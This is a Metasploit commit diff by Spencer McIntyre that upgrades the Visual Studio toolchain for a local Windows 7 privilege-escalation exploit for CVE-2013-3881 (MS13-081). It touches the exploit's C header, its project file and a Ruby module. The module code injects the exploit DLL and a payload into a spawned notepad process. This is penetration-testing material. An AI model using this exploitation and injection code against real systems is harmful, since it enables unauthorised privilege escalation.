Upgrade toolchain to Visual Studio 2013 v120.

bug/bundler_fix
Spencer McIntyre 2014-02-10 09:35:07 -05:00
parent 01f41a209c
commit 0ac1acda70
3 changed files with 15 additions and 11 deletions

View File

@ -3,7 +3,7 @@
* Date: February 5, 2014
* Vulnerability Discovery: Seth Gibson and Dan Zentner of Endgame
* Exploit Author: Spencer McIntyre
* Version: Windows 7 SP1
* Version: Windows 7 SP0/SP1
* Tested on: Windows 7 SP0/SP1
* CVE-2013-3881 MS13-081
* References:
@ -22,7 +22,11 @@
#define WIN32_NO_STATUS
#include <windows.h>
#undef WIN32_NO_STATUS
#include <winternl.h>
#ifndef _NTDEF_
typedef __success(return >= 0) LONG NTSTATUS;
typedef NTSTATUS *PNTSTATUS;
#endif
#define TABLE_BASE 0xff910000

View File

@ -1,5 +1,5 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
@ -20,14 +20,14 @@
<UseDebugLibraries>true</UseDebugLibraries>
<WholeProgramOptimization>false</WholeProgramOptimization>
<CharacterSet>MultiByte</CharacterSet>
<PlatformToolset>v90</PlatformToolset>
<PlatformToolset>v120</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<WholeProgramOptimization>false</WholeProgramOptimization>
<CharacterSet>MultiByte</CharacterSet>
<PlatformToolset>v90</PlatformToolset>
<PlatformToolset>v120</PlatformToolset>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">

View File

@ -22,8 +22,8 @@ class Metasploit3 < Msf::Exploit::Local
'Description' => %q{
This module exploits a vulnerability in win32k.sys where under
specific conditions TrackPopupMenuEx will pass a NULL pointer to
the EndMenuState. This module has been tested successfully on
Windows 7 SP0 and Windows 7 SP1.
the MNEndMenuState procedure. This module has been tested
successfully on Windows 7 SP0 and Windows 7 SP1.
},
'License' => MSF_LICENSE,
'Author' =>
@ -102,15 +102,15 @@ class Metasploit3 < Msf::Exploit::Local
process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS)
print_good("Process #{process.pid} launched.")
print_status("Reflectively injecting the exploit DLL into #{process.getpid}...")
print_status("Reflectively injecting the exploit DLL into #{process.pid}...")
library_path = ::File.join(Msf::Config.data_directory, "exploits",
"cve-2013-3881", "cve-2013-3881.x86.dll")
library_path = ::File.expand_path(library_path)
print_status("Injecting exploit into #{process.getpid} ...")
print_status("Injecting exploit into #{process.pid}...")
exploit_mem, offset = inject_dll_into_process(process, library_path)
print_status("Exploit injected. Injecting payload into #{process.getpid}...")
print_status("Exploit injected. Injecting payload into #{process.pid}...")
payload_mem = inject_into_process(process, payload.encoded)
# invoke the exploit, passing in the address of the payload that